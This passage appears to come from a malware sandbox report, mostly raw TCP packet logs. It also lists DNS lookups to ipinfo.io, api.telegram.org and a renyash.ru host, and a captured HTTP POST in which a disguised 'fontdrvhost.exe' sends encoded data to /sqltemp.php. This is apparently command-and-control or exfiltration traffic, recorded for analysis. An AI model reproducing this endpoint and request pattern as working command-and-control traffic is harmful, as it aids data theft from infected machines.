                                                                                                                                                                                            Jan 1, 2025 14:53:46.420586109 CET8050153104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:46.464854002 CET5015380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.536823988 CET5015380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.537923098 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.542152882 CET8050153104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:46.542767048 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:46.542848110 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.542850018 CET5015380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.543155909 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.547909021 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:46.904887915 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:46.909699917 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.008742094 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.058621883 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.287607908 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.339891911 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.419639111 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.420376062 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.424660921 CET8050154104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.424706936 CET5015480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.425192118 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.425247908 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.425374985 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.430134058 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.786308050 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:47.791233063 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.899344921 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:47.949235916 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.067704916 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.121117115 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.320431948 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.325443029 CET8050155104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.325674057 CET5015580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.326565027 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.331423998 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.331500053 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.331922054 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.336689949 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.685626984 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:48.690484047 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.794903040 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:48.841631889 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.049679995 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.089881897 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.160701036 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.161623955 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.165788889 CET8050156104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.165874958 CET5015680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.166465998 CET8050157104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.166620016 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.166752100 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.171484947 CET8050157104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.511910915 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.516796112 CET8050157104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.610718012 CET8050157104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.652363062 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.787396908 CET8050157104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.839871883 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.915522099 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.920463085 CET8050158104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:49.920536995 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.920640945 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:49.925426006 CET8050158104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.277642012 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.282591105 CET8050158104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.365046978 CET8050158104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.418087006 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.544817924 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.544847012 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.549829960 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.550215006 CET8050158104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.550295115 CET5015880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.550338030 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.550461054 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.555254936 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.693027973 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.697911978 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.701746941 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.706374884 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.711172104 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.906358957 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:50.911201000 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:50.911329985 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.023423910 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.058682919 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.063520908 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.077636003 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.146275043 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.199249983 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.277184010 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.322377920 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.408626080 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.449255943 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.529233932 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.529325962 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.530371904 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.536453009 CET8050159104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.536523104 CET5015980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.536751032 CET8050160104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.536789894 CET5016080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.537087917 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.537153959 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.537328959 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.542119026 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.886874914 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:51.891843081 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:51.983777046 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.027381897 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.165478945 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.214879990 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.286892891 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.286897898 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.291718960 CET8050162104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.291824102 CET8050161104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.291909933 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.291913033 CET5016180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.293652058 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.298439026 CET8050162104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.636948109 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:52.641849995 CET8050162104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.737909079 CET8050162104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:52.777386904 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.002363920 CET8050162104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.061650991 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.133655071 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.139256954 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.141731024 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.141861916 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.146915913 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.496325970 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.502763033 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.606446981 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.652386904 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:53.781343937 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:53.824276924 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.080002069 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.086689949 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.090404034 CET8050163104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.090446949 CET5016380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.092329979 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.092407942 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.092643976 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.097395897 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.449357986 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.454754114 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.558806896 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.607713938 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.816668987 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.871211052 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.924984932 CET5016280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.925108910 CET5008180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.925112009 CET5015780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.930722952 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.930727005 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.935578108 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.935663939 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.935722113 CET8050164104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:54.936029911 CET5016480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.936392069 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:54.941175938 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.300215006 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.305047035 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.406207085 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.449302912 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.580766916 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.621172905 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.695362091 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.696157932 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.701884031 CET8050165104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.701940060 CET5016580192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.702231884 CET8050166104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:55.702296972 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.702456951 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:55.708709002 CET8050166104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.058954000 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.065105915 CET8050166104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.166136980 CET8050166104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.294760942 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.295671940 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.300928116 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.301896095 CET8050166104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.304071903 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.304081917 CET5016680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.304245949 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.310219049 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.463951111 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.468820095 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.472254038 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.472393990 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.479276896 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.656558990 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.661422014 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.661607027 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.824680090 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.829639912 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.850624084 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:56.902426958 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:56.968689919 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.102567911 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.152417898 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.168168068 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.227380991 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.277426958 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.354871035 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.354957104 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.356698990 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.359905958 CET8050167104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.359956980 CET5016780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.360270023 CET8050168104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.360312939 CET5016880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.361485004 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.361552000 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.361722946 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.366494894 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.715821028 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:57.720762968 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.825799942 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:57.871174097 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.121304989 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:58.121516943 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.126595020 CET8050169104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:58.126774073 CET5016980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.241099119 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.246260881 CET8050170104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:58.246364117 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.246509075 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:58.251559973 CET8050170104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:58.691876888 CET8050170104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:58.746177912 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:54:02.904875994 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:54:02.909862995 CET8050170104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:54:03.167634010 CET8050170104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:54:03.215068102 CET5017080192.168.2.4104.21.38.84
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jan 1, 2025 14:51:59.667238951 CET6422653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 1, 2025 14:51:59.673897028 CET53642261.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:01.517868042 CET6382053192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 1, 2025 14:52:01.525840998 CET53638201.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:06.965109110 CET6116153192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 1, 2025 14:52:07.095810890 CET53611611.1.1.1192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:52:11.730811119 CET5649653192.168.2.41.1.1.1
                                                                                                                                                                                            Jan 1, 2025 14:52:11.739497900 CET53564961.1.1.1192.168.2.4
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Jan 1, 2025 14:51:59.667238951 CET192.168.2.41.1.1.10x69a4Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:01.517868042 CET192.168.2.41.1.1.10x590cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:06.965109110 CET192.168.2.41.1.1.10xfb64Standard query (0)250345cm.renyash.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:11.730811119 CET192.168.2.41.1.1.10xdfabStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Jan 1, 2025 14:51:59.673897028 CET1.1.1.1192.168.2.40x69a4No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:01.525840998 CET1.1.1.1192.168.2.40x590cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:07.095810890 CET1.1.1.1192.168.2.40xfb64No error (0)250345cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:07.095810890 CET1.1.1.1192.168.2.40xfb64No error (0)250345cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false
                                                                                                                                                                                            Jan 1, 2025 14:52:11.739497900 CET1.1.1.1192.168.2.40xdfabNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                            • ipinfo.io
                                                                                                                                                                                            • api.telegram.org
                                                                                                                                                                                            • 250345cm.renyash.ru
                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.449733104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:52:07.106208086 CET318OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 344
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:52:07.465198040 CET344OUTData Raw: 00 01 04 06 06 0e 04 05 05 06 02 01 02 04 01 01 00 06 05 0f 02 0d 03 09 01 01 0a 06 05 02 01 50 0f 56 04 01 03 04 07 00 0e 57 02 0b 07 01 04 02 05 03 0f 01 0a 05 04 52 01 07 03 05 06 01 04 01 01 0b 0e 0b 07 54 04 08 0e 00 0b 0f 0c 0d 0c 06 02 00
                                                                                                                                                                                            Data Ascii: PVWRTUV\L}ThNbMca}LbetO|lvXclLhZs_xllXl^_^CsT`IcZe~V@@xSbbu
                                                                                                                                                                                            Jan 1, 2025 14:52:07.558592081 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:52:07.825913906 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:52:07 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pi8MQGShCUyzcczhtLSXbeu%2FJdkAv8gfmyBhHDb2rjKS28jkU5tWOfdMzWwJB3fL3pvteKCkliPkofiGu0yksulXXrtvNOJgfReD0bcICnM%2BdBR1OIgLEJjDSM9Ox7Gxt9FU6jSa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fceeff15729b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2050&min_rtt=2016&rtt_var=824&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=662&delivery_rate=637554&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
